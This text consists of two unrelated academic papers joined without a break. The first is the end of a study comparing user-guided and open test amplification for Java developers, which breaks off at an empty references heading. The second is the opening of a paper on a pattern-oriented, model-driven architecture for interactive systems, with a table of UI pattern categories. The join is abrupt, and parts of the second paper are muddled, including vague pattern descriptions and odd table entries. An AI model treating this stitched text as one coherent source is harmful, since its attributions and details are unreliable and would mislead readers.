Looking at all the results of our user study, we see that a majority of our participants prefer the user-guided test amplification approach (Q16) because it fits better into the typical situation in which they create tests: when they want to test a specific location in their code. Factors contributing to this judgement are that all participants found branch coverage easier to understand than instruction coverage (Q13), and most preferred the structure-revealing control-flow graph visualization over the more precise textual representation of additional coverage (Q14). This preference for user-guided test amplification is also supported by the overall more positive ratings in the detailed questions about the approach (Q1-5), compared to the detailed questions about open test amplification (Q6-10). From the explanations of our participants we learned that they do not universally prefer user-guided test amplification over open test amplification; rather, the preference depends on their use case, the information they need to judge the amplified tests, and the amount of control they want to have over the amplification process. The results of our technical study showed that the effectiveness of guided test amplification compared to open test amplification depends on the class structure in the code under test and the data types used as parameters. Taken together, we see that there are trade-offs between the two approaches that should be considered when choosing which one to work with or to improve in future research. In Section V we collect these trade-offs and discuss their implications for practitioners and researchers.

G. Threats to Validity

There are several threats to the validity of our two studies and their results.
When it comes to internal validity, we mitigated the threats by switching the order of the two approaches (threat: learning effect) and which class each approach was applied to (threat: dissimilar classes) equally over the four randomly-assigned participant groups. The characteristics of the two projects and their classes could dictate the outcome of our technical study. To mitigate this, we manually analyzed the classes and transparently discuss the impact of the number of methods per class and the complexity of the used data types on the effectiveness comparison of the test amplification approaches. To ensure the confirmability of our user study results, we focus on presenting the closed question ratings and support them with explanations staying as close as possible to the participants' formulations.

Regarding construct validity, the results of both studies are influenced by our prototype implementations. We used the same test amplification tool for both approaches, which is based on DSpot and limited to Java, with the only differences in implementation described in Section III. Another threat is whether we are measuring the effect of the different amplification approaches or of the changed user interface (UI) from open to user-guided test amplification. We agree with the original creators of developer-centric test amplification [7] that a tool for developers and its UI fundamentally cannot be developed or studied in isolation. To mitigate this threat, we ask our participants separate questions about the information and the UI elements (Q1/2, Q4/5, Q6/10, Q13/14).

The external validity of the results from our technical study is threatened by the two projects selected for the case study. We observed that the complexity of the used data types and the number of methods in a class influence the effectiveness of the test amplification.
Further studies on a larger variety of projects and classes are needed to demonstrate the generalizability of our findings. Another threat to the external validity of our user study is whether the participants experienced the whole variety of methods one might test with amplification. To mitigate this, we selected example classes with methods of varied complexity and initial tests that cover some methods of the class fully, partially or not at all. In the user study we have participants from a range of different software domains, but no participant has more than ten years of development experience, making the results potentially not generalizable to very senior developers.

V. DISCUSSION AND IMPLICATIONS FOR PRACTITIONERS AND RESEARCHERS

In designing user-guided test amplification, we set out to improve the effectiveness of the process and the understandability of the produced tests. Our technical case study indicates that user-guided test amplification is indeed more effective, and the user study suggests that developers find its components more understandable than those of open test amplification. However, we also saw that the effectiveness of each approach varies per project and class, and that developers might prefer different test amplification approaches depending on their current goal with testing. In this section, we discuss a series of trade-offs that we identified based on our two studies and the design of both amplification techniques. Table IV gives an overview of these trade-offs, together with the source from which we take the answer for either technique.

The two amplification approaches fit two complementary use cases for software developers. From the participants reflecting on which approach is more helpful to generate tests (Q16), we learned that the user-guided version is better suited when they write tests in conjunction with the production code, also called test-guided development [3], [13].
When their focus is to improve the test suite itself, e.g., to address technical test debt [14]–[17], open test amplification would be the better choice. This is because it connects an amplified test more clearly to the original test from the test suite by pointing out the applied input modifications. Open test amplification also informs the developer about the coverage impact of an amplified test across the whole project [7]. With the high prevalence of integration tests in JUnit test suites [18], [19], tests amplified from them can improve test coverage in several locations throughout a software project [9]. Because this scattered coverage information can be confusing [7] and partially irrelevant to developers [9], user-guided test amplification focuses only on the impact in the targeted method. In return, it can use the available room to convey the stronger metric of branch coverage in a simple and easy-to-understand visualization (Q14).

A previous study on the interaction of software developers with test amplification showed the importance of managing the users' expectations and making sure they align with what the tool can provide [7]. Open test amplification only proposes tests for locations it can actually cover, so it can easily fulfill the user's expectations of receiving tests. In our proposal of user-guided test amplification the developers can select any branch as a target, but as we saw in the technical study, more than half of the branches in our study projects could not be covered. This might disappoint the user and not meet their expectations. When the participants of our study encountered this, however, they were positive about the fact that the tool clearly reported that it could not generate a test (participant reflection on Q12). To address the low success rate of guided test amplification, we would need to initialize the objects and parameters correctly to hit the targeted branch (manual inspection, technical study).
Advanced techniques like concolic execution [20]–[22] or search-based optimization [23] could address this. However, these can be expensive to compute. When studying the effectiveness of test amplification in our technical study, we saw that guided test amplification produces a higher ratio of tests that successfully cover the targeted branch. This fits well with the use case of testing the developer's current focal method. In contrast, the more explorative search in the whole method space of a class under test that open test amplification performs is more effective when the goal is to improve the coverage across the whole class. Someone who uses guided test amplification for this would need to invoke it repeatedly for each method in the class.

A. Implications for Practitioners

Our evaluation of user-guided and open test amplification uncovered a set of trade-offs a software developer or their manager should consider when choosing which approach to apply. The main, recurring consideration is why someone wants to generate tests: (1) to improve the test suite itself (choose open test amplification), or (2) to get support for writing tests while working on a specific part of the production code (choose user-guided test amplification). Beyond this, our study also shows anecdotal evidence that when a code base contains many complex classes without public constructors, test amplification with our state-of-the-art tool will likely not be able to cover many branches.

B. Implications for Researchers

For researchers in the area of test amplification and generation, as well as developer-centric support tools, the insights from our study point to several new research directions. Improving the effectiveness of guided test amplification calls for more advanced techniques to initialize objects so that the targeted branch is covered. Can we apply computationally expensive techniques while still providing an interactive user experience?
Could we actively ask the developer to help us with the initialization of objects that are hard to create? Here the question is whether they would know enough to provide a valuable initialization, and whether the automation would still be worthwhile for the developer if they had to contribute such substantial effort to the test generation. Many decisions in the design of either test amplification approach are motivated by the required interactive speed. Would it be feasible to pre-generate tests in the background and then selectively present relevant ones to the developer when they request tests? A complication here is that current developer-centric test generation approaches, like test amplification or search-based generation with EvoSuite [24], require the code under test to be available. However, we observed repeatedly in our user study that developers are looking for tests covering the code they wrote just a short while ago.

Why did the participants of our study prefer the control-flow graph visualization of the branch coverage over the bytecode instruction visualization of the line coverage? Based on our observations, we conjecture that the following aspects could influence this: (1) using a coverage metric that is embedded in the developer's mental structure of the code, (2) limiting the scope of the displayed code coverage to just the one method the developer is concerned about, and (3) presenting the existing coverage in conjunction with the additionally provided coverage, letting the developer grasp the differential impact a new amplified test makes.

VI. RELATED WORK

In this section, we discuss related work from the areas of directed and interactive test generation.

A. Directed Test Generation

Search-Based Software Testing (SBST) uses search algorithms to automatically find tests that satisfy a variety of test objectives captured in a fitness function [25].
SBST has been used to automate test generation for various test goals, such as maximizing structural coverage [26]–[30] and crash reproduction [23], [31], [32]. Test suite augmentation techniques are used to generate tests that target code changes that the existing test suite does not cover [33]. Xu et al. proposed several approaches for test augmentation using concolic testing [34], genetic algorithms [35], and a combined, hybrid approach [36], [37]. In their concolic approach, they find the source node of a changed branch and select existing tests that reach this source node. Then they explore different directions of path conditions to find new tests for the changed branch. Their genetic algorithm uses a fitness function based on the distance between a test's execution and the changed branch. In contrast to their approach, our test amplification targets all uncovered branches of the software, not just the recently changed ones. Further, our approach is simpler, as we only select a few initial tests and amplify them with a single evolutionary iteration. Several researchers have focused on generating targeted tests to support debugging. Ma et al. propose directed symbolic execution, using the distance to the target line as information to guide the symbolic execution [38]. Ding et al. [39] combine symbolic execution, to find a suitable entry point to reach a target statement, with concolic execution and heuristics, to try to satisfy constraints too difficult for the symbolic execution. Our approach makes use of the existing tests as a basis for the amplification, and we avoid symbolic execution to keep our computational costs low.

B. Interactive Test Generation

Several techniques have been proposed to incorporate information provided by humans into the test generation process. Marculescu et al. proposed Interactive Search-Based Software Testing (ISBST) to involve domain specialists in test generation [40].
Their feedback adapts the fitness function during the search process by changing the relative importance of system quality attributes. The primary difference between their work and ours is that they involve domain specialists in the test generation, while we target software developers. They pointed out the importance of perfecting how automated test systems communicate with users and of ensuring that results are understandable to the users when transferring ISBST to industry [41]. We address this in the design of our interface, visualizing information about the test amplification results to aid the user's comprehension. Murphy et al. propose to apply grammatical evolution to SBST and incorporate human expertise into the search [42]. They proposed that users can define the search space their tests are created from by specifying a grammar. By analyzing various studies that evaluated the effectiveness and acceptance of test generation tools, Ramírez et al. observed two key issues hindering the acceptance of automatically generated tests [43]: the opacity of the generation process and the lack of cooperation with the tester. To address this, they incorporate the tester's subjective assessment of readability to compare tests with the same fitness in a search-based test generation process. Our work also addresses the concerns Ramírez et al. raised. We cooperate with testers and make the process transparent by letting testers express their branch coverage goal and guide the test generation. We also improve the understandability of tests by connecting the amplified tests with testers' coverage goals.

VII. CONCLUSION AND FUTURE WORK

The aim of user-guided test amplification was to ease the effort software developers spend on understanding amplified tests, by letting them point the test generation to a specific target branch and then visualizing the resulting coverage on a control flow graph of the method under test.
Through our technical case study, we show that even simple modifications to the amplification process make guided test amplification more effective at generating tests for a targeted branch. Our user study shows that developers prefer the interaction with user-guided test amplification, but that the choice for either technique depends on the developer's current use case. From our studies and the design of both approaches, we identify and discuss four trade-offs that influence the choice between open and user-guided test amplification: (1) the current task and goal of the developer, (2) where the amplified test should provide coverage, (3) the ability to fulfill the user's expectation to receive a generated test, and (4) the available time for the test amplification. Beyond the research implications we mentioned earlier, our work can be the basis for several future research directions. We observed developers' wish to generate tests while they are working on a particular piece of code. While user-guided test amplification is a step in this direction, the next step would be to detect when a developer has finished a change, and automatically generate and propose a test for the code change to the developer. The feedback on the coverage visualization showed that it helps developers understand test coverage better. On the other hand, the expectations of the user guiding the amplification now require more advanced test generation approaches that are already available in other tools. The next step would be to disconnect the test generation tool from the interaction layer that proposes the tests to developers. This allows for more flexibility in choosing the test generation tool that is right for the job while still benefiting from continued advancements in test communication.

REFERENCES
Abstract

Day-to-day experience suggests that it is not enough to approach a complex design armed with design tips, guidelines, and hints. Developers must also be able to use proven solutions emerging from the best design practices to solve new design challenges. Without these, the designer will not be able to properly apply guidelines or take full advantage of the power of technology, resulting in poor performance, poor scalability, and poor usability. Furthermore, the designer may "reinvent the wheel" when attempting to implement a design solution. A number of design problems continue to arise, such as: (1) decoupling the various aspects of interactive systems (for example, business logic, the UI, navigation, and information architecture); and (2) isolating platform specifics from the concerns common to all interactive systems. In the context of a proposal for a Pattern-Oriented and Model-Driven Architecture (POMA) for interactive systems, this paper identifies an extensive list of pattern categories and types of models aimed at providing a pool of proven solutions to these problems. The models of patterns span several levels of abstraction, such as domain, task, dialog, presentation, and layout. The proposed POMA architecture illustrates how several individual models can be combined at different levels of abstraction into heterogeneous structures, which can then be used as building blocks in the development of interactive systems. First, we describe the architectural levels and the categories of patterns, as well as the various relationships between patterns; second, we propose five categories of models to address the problems described above which are associated with creating an interactive system. Third, we present the proposed POMA architecture. Fourth, we present a case study to illustrate and clarify the core ideas of our approach and its practical relevance.
Keywords: Patterns, Models, Architecture, Interactive Systems, Composition, Mapping, Transformation, POD, MDA, POMA

1. Introduction

During the past two decades, research on interactive system and user interface (UI) engineering has resulted in a set of design principles and development frameworks which constitute a major contribution, not only to facilitate the development and maintenance of interactive systems, but also to promote the standardization, portability, and ergonomic "usability" (ease of use) of the interactive systems being developed. Some of these principles are:

- A precise definition of the UI aimed at: (i) presenting the output to the user; (ii) gathering user entries to transmit them to the interactive system procedures that will treat them; (iii) handling the dialog sequence;
- The separation of concerns, especially decoupling the UI from the system semantics;
- The definition of reusable and standardized UI components;
- Decentralization of dialog management, help, and errors across the various components of an interactive system;
- Programming driven by events.

Indeed, an interactive system is a program with which the user engages in conversation (dialog) in order to accomplish tasks. An interactive system consists of two parts: the software, which is referred to as the interactive application, and the hardware, which supports the execution of the software part. The software (interactive application) can, in turn, be divided into two sub-parts: the UI, and the algorithms that constitute the semantics of the interactive system. The hardware in an interactive system consists of input and output devices and various managers (device drivers) which provide physical support to the execution of the interactive application. At the same time, a UI can be seen as a means by which the user and the machine can exchange data.
For example, the screen on which data are displayed is a medium for user-machine interaction and for feedback in response to the user's actions. Therefore, a UI is part of an interactive application which:

- Presents the output to the user,
- Collects the user's inputs and transmits them to the interactive system that treats them, and
- Handles the dialog sequence.

Based on these principles, several interactive system architectural models have been introduced. Buschmann et al. define architectural models as [41]: "the structure of the subsystems and components of a system and the relationships between them typically represented in different views to show the relevant functional and non functional properties." This definition introduces the main architectural components (for instance, subsystems, components, and connectors) and covers the ways in which to represent them, including both functional and non-functional requirements, by means of a set of views. A number of architectures specific to interactive systems have been proposed, e.g. the Seeheim model [55; 48], Model-View-Controller (MVC) [43], Agent Multi-Faceted (AMF) [54], which is an extension of MVC, Arch/Slinky [47], Presentation Abstraction Control (PAC) [44; 45], PAC-Amadeus, and Model-View-Presenter (MVP) [27]. Most of these architectures consist of three main elements: (1) abstraction or model; (2) control or dialog; and (3) presentation. Their goal is to improve and facilitate the design of interactive systems. However, even though the principle of separating an interactive system into components has its design merits, it can also be a source of serious adaptability and usability problems in systems which provide fast, frequent, and intensive semantic feedback: the communication between the view and the model makes the interactive system highly coupled and complex.
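To make the separation of abstraction, control, and presentation concrete, here is a minimal sketch of the MVC decomposition mentioned above. The class and method names are generic illustrations, not taken from any of the cited frameworks:

```python
class Model:
    """Holds application state (the semantics of the interactive system)."""
    def __init__(self):
        self.value = 0
        self.observers = []

    def attach(self, view):
        self.observers.append(view)

    def set_value(self, v):
        self.value = v
        for view in self.observers:   # notify views of semantic changes
            view.update(self)

class View:
    """Presents output to the user; knows nothing about input handling."""
    def __init__(self):
        self.rendered = None

    def update(self, model):
        self.rendered = f"value = {model.value}"

class Controller:
    """Translates user input into operations on the model."""
    def __init__(self, model):
        self.model = model

    def on_user_input(self, raw):
        self.model.set_value(int(raw))

model, view = Model(), View()
model.attach(view)
Controller(model).on_user_input("42")
print(view.rendered)  # value = 42
```

Even in this toy form, the coupling problem the text describes is visible: the view must be notified of every semantic change, so systems with intensive semantic feedback generate heavy model-to-view traffic.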
Among the problems presented by the architectures quoted above are:

- No guideline is provided to encourage the designer to consider other aspects of the dialog that are important to the user, such as assistance or error-handling;
- Lack of facilitation of the use of constraints for the design and description of the interface, when these constraints are of great importance to the designer [49; 50; 51; 52; 53; 46];
- The architectural models are poorly located in relation to the life cycle of the UI, which can lead, in particular, to difficulties concerning the passage from the problem analysis (analysis of user needs), expressed generally in terms of tasks and interaction sequences, to the concepts put forward by these architectures (agents, presentation components, dialog components).

Architectural patterns have been proposed to alleviate some of these problems, and indeed were introduced based on the following observation by Alexander: "Each pattern describes a problem that occurs constantly in our environment, and thus describes the heart of the solution to this problem, in such a way that we can use this solution millions of times, but never do it twice the same way" [40]. Such a pattern provides, on one level, a pool of proven solutions to many of the recurring problems listed above. The Pattern-Oriented Software Architecture is an example of a new approach which shows how to combine individual patterns into heterogeneous structures and, as such, can be used to facilitate a constructive instantiation of a system architecture. Patterns provide various benefits, such as:

- Well-established solutions to architectural problems,
- Help in documenting architectural design decisions, and
- Facilitation of communication between users through a common vocabulary.

However, we note that the emergence of patterns in the architectural development of interactive systems has not solved some problems associated with this development.
Among the challenging problems we address in this paper are the following: (a) decoupling of the various aspects of interactive systems, such as business logic, UI, navigation, and information architecture; (b) isolation of the platform-specific problems from the concerns common to all interactive systems. In 2001, the Object Management Group introduced the Model-Driven Architecture (MDA) initiative as an approach to system specification and interoperability based on the use of formal models (i.e. defined and formalized models). The main idea behind MDA is to specify business logic in the form of abstract models. These models are then mapped (partly automatically), according to a set of transformation rules, to different platforms. The models are usually described in UML in a formalized manner which can be used as input for tools to perform the transformation process. Indeed, a model is a formal description of some key aspects of a system, from a specific viewpoint. As such, a model always presents an abstraction of the "real" thing, by ignoring or deliberately suppressing those aspects that would not be of interest to a user of that model. Different modeling constructs focus attention by ignoring certain things [35]. For example, an architectural model of a complex system might focus on its concurrency aspects, while a financial model of a business might focus on projected revenues. Model syntax includes graphical or tabular notations and text. D'Souza [35] has identified key opportunities and modeling challenges, and illustrated how the "model" and the "architecture" of MDA could be used to enable large-scale model-driven integration. The advantages of the models are as follows:

- They make it easier to validate the correctness of a model.
- They make it easier to produce implementations on multiple platforms.
- Integration/interoperability across platforms is better defined.
- Generic mappings/patterns can be shared by many designs.
- They constitute an interactive system of tool-supported solutions.

However, we note that the model-driven approach has some weaknesses as well:

- MDA does not provide a standard for the specification of mappings: different implementations of mappings can generate very different code and models, which can create dependencies between the system and the mapping solution used.
- Designers must take into account a diversity of platforms which exhibit drastically different capabilities. For example, Personal Digital Assistants (PDAs) use a pen-based input mechanism and have an average screen size in the range of 3 inches.
- The architectural models must be positioned relative to the life cycle of the UI: in particular, difficulties may arise related to the problem analysis (analyzing user needs), expressed generally in terms of tasks and interaction sequences, and to the concepts proposed by these architectures (agents, presentation components, and dialog components).

Our research goal can be stated as follows: "a new architecture to facilitate the development and migration of interactive systems while improving their usability and quality." To pursue this goal, it is necessary to define a systematic architecture, supported by a CASE tool, to glue patterns together. In this paper, we identify some of the fundamentals of such an architecture and we present an architecture called the Pattern-Oriented and Model-Driven Architecture (POMA) (Figure 14). We also present an evaluation of the feasibility of some phases of this architecture, such as composing and mapping patterns, and transforming models to create platform-independent models (PIM) and platform-specific models (PSM). Figure 1 summarizes the architectural patterns and models that were combined to obtain the POMA architecture. In this paper, we propose an architectural model which combines two key approaches: model-driven and pattern-oriented.
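The PIM-to-PSM mapping at the heart of the model-driven half of this proposal can be pictured as a rule-driven transformation of an abstract model into platform-specific artifacts. The widget vocabulary and the transformation rules below are invented purely for illustration:

```python
# A platform-independent model (PIM): abstract widget types only.
pim = [
    {"widget": "choice", "label": "Country"},
    {"widget": "command", "label": "Submit"},
]

# Transformation rules mapping abstract widgets onto two target platforms
# with drastically different capabilities (desktop vs. small-screen PDA).
rules = {
    "desktop": {"choice": "ComboBox", "command": "Button"},
    "pda":     {"choice": "SearchField", "command": "SoftKey"},
}

def to_psm(pim, platform):
    """Apply the platform's rules to derive a platform-specific model (PSM),
    leaving the PIM itself untouched."""
    return [dict(m, widget=rules[platform][m["widget"]]) for m in pim]

print([m["widget"] for m in to_psm(pim, "desktop")])  # ['ComboBox', 'Button']
print([m["widget"] for m in to_psm(pim, "pda")])      # ['SearchField', 'SoftKey']
```

The sketch also illustrates the standardization weakness noted above: two tools with different `rules` tables would produce very different platform-specific models from the same PIM.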
First, we describe architectural levels and categories of patterns, as well as the various relationships between patterns. These relationships are used next to combine and map several categories of patterns to create a pattern-oriented design for an interactive system, as well as to show how to generate specific implementations suitable for different platforms from the same pattern-oriented design. Second, we propose five categories of models (Domain model, Task model, Dialog model, Presentation model, and Layout model) which address problems such as: (a) decoupling the various aspects of interactive systems, such as business logic, UI, navigation, and information architecture; and (b) isolating the platform-specific problems from the concerns common to all interactive systems. Third, the proposed Pattern-Oriented and Model-Driven Architecture (POMA) illustrates how the individual models mentioned above can be combined at different levels of abstraction into heterogeneous structures to be used as building blocks in the development of interactive systems. Fourth, we present a case study to illustrate our approach and its practical relevance. Finally, we provide a conclusion on the research carried out and comment on its future evolution.

2. Patterns and Pattern-Oriented Architecture

2.1. About Patterns

The idea of using patterns in system design and engineering is not new. It has its roots in the popular "Gang of Four" work [2]. Collections of patterns include patterns for user interface (UI) design [3; 4; 5], patterns for navigation in a large information architecture, and patterns for visualizing and presenting information. More recently, the concept of the usability pattern has been introduced and discussed as a tool for ensuring the usability of developed systems [16; 17; 18]. A usability pattern is a proven solution for a User Centered Design (UCD) problem that recurs in different contexts.
The primary goal of usability patterns in general is to create an inventory of solutions to help UI designers to tackle UI development problems which are common and difficult to solve [19].

2.2. Architectural Levels and Categories of Patterns

A number of pattern languages have been suggested, such as in Van Duyne’s “The Design of Sites” [10], Welie’s “Interaction Design Patterns” [5], and Tidwell’s “UI Patterns and Techniques” [3]. In addition, specific languages have been proposed, such as in Laakso’s “UI Design Patterns” [31] and the UPADE Language [29]. Moreover, various specialized collections of patterns have been published, including patterns for Web page layout design [3; 4; 5], patterns for navigation around information architectures, and patterns for visualizing and presenting information. In our work here, we illustrate how these existing collections of patterns can be used as building blocks in the context of the proposed six-layer architecture. An informal survey conducted in 2004 by the HSCE Research Group at Concordia University identified at least six architectural levels and six categories of patterns which can be used to create a pattern-oriented interactive system architecture. Table 1 illustrates these six levels of architecture for an interactive system, including the corresponding categories of patterns, and gives examples of patterns in each category.

| Architectural Level and Category of Patterns | Examples of patterns |
| --- | --- |
| **Information**: describes different conceptual models and architectures for organizing the underlying content across multiple pages, servers, and computers. Such patterns provide solutions to questions such as which information can or should be presented on which device. This category of patterns is described in [39]. | Reference Model, Data Column, Cascaded Table, Relational Graph, Proxy Tuple, Expression, Schadler, Operator, Renderer, Production Rule, Camera |
| **Interoperability**: describes decoupling the layers of an interactive system, in particular between the content, the dialog, and the views or presentation layers. These patterns are generally extensions of the Gamma design patterns, such as the MVC (Model, View, Controller) observer and command action patterns. Communication and interoperability patterns are useful for facilitating the mapping of a design between platforms. | Adapter, Bridge, Builder, Decorator, Façade, Factory Method, Mediator, Memento, Prototype, Proxy, Singleton, State, Strategy, Visitor |
| **Visualization**: describes different visual representations and metaphors for grouping and displaying information in cognitively accessible chunks. They mainly define the format and content of the visualization, i.e. the graphical scene, and, as such, relate primarily to data and mapping transforms. | Favorite Collection, Bookmark, Frequently Visited Page, Navigation Space Map |
| **Navigation**: describes proven techniques for navigating within and/or between a set of pages and chunks of information. This list is far from exhaustive, but helps to communicate the flavor and abstraction level of design patterns for navigation. | Shortcut, Breadcrumb, Contextual (temporary) horizontal menu at top, Contextual (temporary) vertical menu at right, Information portal, Permanent horizontal menu at top, Permanent vertical menu at left, Progressive filtering, Shallow menus, Simple universal, Split navigation, Sub-sites, User-driven, Alphabetical index, Key-word search, Intelligent agents, Container navigation, Deeply embedded menus, Hybrid approach, Refreshed shallow vertical menus |
| **Interaction**: describes the interaction mechanisms that can be used to achieve tasks and the visual effects they have on the scene; as such, they relate primarily to graphical and rendering transforms. | Search, Executive Summary, Action Button, Guided Tour, Paging, Pull-down Button, Slideshow, Stepping, Wizard |
| **Presentation**: describes solutions for how the contents or the related services are visually organized into working surfaces, the effective layout of multiple information spaces, and the relationship between them. These patterns define the physical and logical layout suitable for specific interactive systems. | Carrousel, Table Fiber, Detail On Demand, Collector, In-place Replacement, List Builder, List Entry View, Overview by Detail, Part Selector, Tabs, Table Sorter, Thumbnail, View |

Table 1: Architectural levels and categories of patterns

Each of these six categories of patterns is discussed below, and examples are provided.
**Information patterns**

An information pattern, also called an information architectural pattern (Figure 2), expresses a fundamental structural organization or schema of information. It provides a set of predefined subsystems (information spaces or chunks), specifies their responsibilities, and includes rules and guidelines for organizing the relationships between them. An information pattern is everything that happens in a single information space or chunk. With another pattern, the content of a system is organized in a sequence in which all the information spaces or chunks are arranged as peers, and every space or chunk is accessible from all the others. This is very common on simple sites, where there are only a few standard topics, such as: Home, About Us, Contact Us, and Products. Information which naturally flows as a narrative, timeline, or in a logical order is ideal for sequential treatment. An index structure is like the flat structure, with an additional list of contents. An index is often organized in such a way as to make its content easier to find. For example, a list of files in a Web directory (the index page), an index of people's names ordered by last name, etc. Dictionaries and phone books are both very large indices. The Hub-and-Spoke pattern is useful for multiple, distinct, linear workflows. A good example would be an email system, where the user returns to his inbox at several points, e.g. after reading a message, after sending a message, or after adding a new contact. A multi-dimensional hierarchy is one in which there are many ways of browsing the same content. In a way, several hierarchies may coexist, overlaid on the same content. The structure of the content can appear to be different, depending on the user's task (search, browse). A typical example would be a site like Amazon, which lets you browse books by genre or by title, and also lets you search by keyword.
Each of these hierarchies corresponds to a property of the content, and each can be useful, depending on the user's situation. A strict hierarchy is a specialization of the multi-dimensional hierarchy, and describes a system where a lower-level page can only be accessed via its parent.

**Interoperability patterns**

Interoperability patterns are useful for decoupling the way these different categories of patterns are organized, the way information is presented to the user, and the user who interacts with the information content. Patterns in this category generally describe the capability of different programs to exchange data via a common set of exchange formats, to read and write the same file formats, and to use the same protocols. Gamma et al. [2] offer a large catalog of patterns for dealing with such problems. Examples of patterns applicable to interactive systems include: Adapter, Bridge, Builder, Decorator, Factory Method, Mediator, Memento, Prototype, Proxy, Singleton, State, Strategy, and Visitor [2]. The Adapter pattern is very common, not only in remote client/server programming, but also in any situation in which there is one class and it is desirable to reuse that class, but where the system interface does not match the class interface. Figure 3 illustrates how an adapter works. In this figure, the Client wants to invoke the method request() in the Target interface. Since the Adaptee class has no request() method, it is the job of the Adapter to convert the request to an available matching method. Here, the Adapter converts the method request() call into the Adaptee method specificRequest() call. The Adapter performs this conversion for each method that needs adapting. This is also known as Wrapping.

![Figure 3: Adapter pattern](image)

**Visualization patterns**

Information visualization patterns allow users to browse information spaces and focus quickly on items of interest.
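Returning briefly to the Adapter collaboration of Figure 3: the Target, Adaptee, and Adapter roles described there map directly onto code. A minimal sketch (the return value is an invented placeholder):

```python
class Target:
    """The interface the Client expects."""
    def request(self):
        raise NotImplementedError

class Adaptee:
    """An existing class with a useful but incompatible interface."""
    def specific_request(self):
        return "adaptee result"

class Adapter(Target):
    """Converts request() calls into specific_request() calls (wrapping)."""
    def __init__(self, adaptee):
        self.adaptee = adaptee

    def request(self):
        return self.adaptee.specific_request()

def client(target):
    # The Client only knows the Target interface, never the Adaptee.
    return target.request()

print(client(Adapter(Adaptee())))  # adaptee result
```

One such forwarding method is written for each operation that needs adapting, which is exactly the per-method conversion the text describes.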
Visualization patterns can help in avoiding information overload, a fundamental issue to tackle, especially for large databases, Web sites, and portals, since these can give access to millions of documents. The designer must consider how best to map the contents into a visual representation which conveys information to the user while facilitating exploration of the content. In addition, the designer must undertake dynamic actions to limit the amount of information the user receives, while at the same time keeping the user informed about the content as a whole. Several information visualization patterns can be combined in such a way that the underlying content is organized into distinct conceptual spaces or working surfaces which are semantically linked to one another. For example, depending on the purpose of the site, users can access several kinds of "pages", such as articles, URLs, products, etc. They typically collect several of these items for a specific task, such as comparing, buying, going to a page, sending a page to others, etc. Users must be able to visualize their "collection". The following are some of the information visualization patterns for displaying such collections: Favorite, Bookmark, Frequently Visited Page, Preferences, and Navigable Spaces Map. This category of patterns provides a map to a large amount of content which can be too much to present reasonably in a single view. The content can be organized into distinct conceptual spaces or working surfaces which are semantically linked, so that it is natural and meaningful to go from one to another. The map in Figure 4 is an example of this category of patterns.

![Figure 4: The Navigation Spaces Map pattern implemented using Tree Hyperbolic, a sophisticated visualization technique.](image)

**Navigation patterns**

Navigation patterns help the user move easily and in a straightforward manner between information chunks and their representations.
They can obviously reduce the user's memory load [7; 1]. See [3; 5; 29; 9] for an exhaustive list of navigation patterns. The Linear Navigation pattern is suitable when a user wants a simple way to navigate from one page to the next in a linear fashion, i.e. move through a sequence of pages. The Index Browsing pattern is similar, and allows a user to navigate directly from one item to the next and back. The ordering can be based on a ranking. For every item presented to the user, a navigation widget allows the user to choose the next or previous item in the list. The ordering criterion should be visible (and be user-configurable). To support orientation, the current item number and total number of items should be clearly visible. A breadcrumb (Figure 5) is a widely used pattern which helps users to know where they are in a hierarchical structure and to navigate back up to higher levels in the hierarchy. It shows the hierarchical path from the top level to the current page and makes each step clickable. ![Figure 5: Breadcrumb pattern](image) Interaction patterns This category of interaction patterns provides basic information on interaction style, mainly on how to use controls such as buttons, lists of items, menus, dialog boxes, etc. This category of patterns is used whenever users need to take an important action that is relevant in the current context of the page they are viewing. Users must be made aware of the importance of the action in relation to other actions on the page or site. To view/act on a linear-ordered set of items, the Stepping pattern (Figure 6) allows users to go to the next and previous task or object by clicking on the 'next' or 'previous' links. The 'next' link takes the users to the next item in the sequence, while the 'previous' link takes them a step back. It is recommended that a 'next' or 'previous' link be placed close to the object to which it belongs, preferably above the object so that users do not have to scroll to it. 
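The stepping logic just described can be sketched as a small helper that computes the state of the 'previous' and 'next' links, together with the "item i of n" orientation cue recommended earlier for Index Browsing. The dictionary layout and the label format are our own illustrative choices, not part of the pattern definition.

```python
def stepping_state(index: int, total: int) -> dict:
    """State of the 'previous'/'next' links for the Stepping pattern,
    plus an 'item i of n' orientation cue for the user."""
    if not 0 <= index < total:
        raise IndexError("index out of range")
    return {
        "previous": index - 1 if index > 0 else None,      # no link on the first item
        "next": index + 1 if index < total - 1 else None,  # no link on the last item
        "label": f"item {index + 1} of {total}",
    }
```

Rendering `None` as a disabled (or hidden) link at either end of the sequence keeps the widgets in a fixed position while preventing navigation past the ends.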
Make sure the next/previous links are always placed in the same location, so that users clicking through a list do not have to move the mouse pointer. The convention, at least in western cultures, is to place the 'previous' link on the left and the 'next' link on the right.

Presentation patterns

The authors of technical documents discovered long before interactive systems were invented that users appreciate short "chunks" of information [6]. Patterns in this category, called Presentation patterns, suggest different ways of displaying chunks of information and of grouping them in pages. Presentation patterns also define the look and feel of interactive systems, while at the same time defining the physical and logical layout suitable for specific systems, such as home pages, lists, and tables. For example, how long does it take to determine whether or not a document contains relevant information? This question is a critical design issue, in particular for resource-constrained (small) devices. Patterns in this category use a grid, which is a technique taken from print design, but which is easily applicable to interactive system design as well. In its strictest form, a grid is literally a grid of X by Y pixels. The elements on the page are then placed on the cell borderlines and aligned overall on horizontal and vertical lines. A grid is a consistent system in which to place objects. In the literature on print design, there are many variations of grids, most of them based on modular and column grids. Often, a mix of both types of grids is used. The grid shown in Figure 7, for example, is used to create several dialog box patterns. ![Figure 7: An example of a grid](image) An example of these types of patterns is the Executive Summary pattern. Our Executive Summary pattern gives users a preview of the underlying information before they spend time downloading, browsing, and reading large amounts of information (Figure 8).
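A minimal sketch of such a preview is shown below, assuming a plain word-count cutoff; the threshold and the trailing ellipsis are illustrative choices, not part of the Executive Summary pattern itself.

```python
def executive_summary(text: str, max_words: int = 40) -> str:
    """Give users a short preview of a long document before they spend
    time downloading and reading it in full."""
    words = text.split()
    if len(words) <= max_words:
        return text
    # Truncate to the first max_words words and signal that more follows.
    return " ".join(words[:max_words]) + " …"
```

In practice the preview would more likely be an author-written abstract than a mechanical truncation; the point is only that the summary is much cheaper to transmit and scan than the underlying information.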
![Figure 8: Example of a structural pattern: Executive Summary](image)

2.3. Pattern Composition

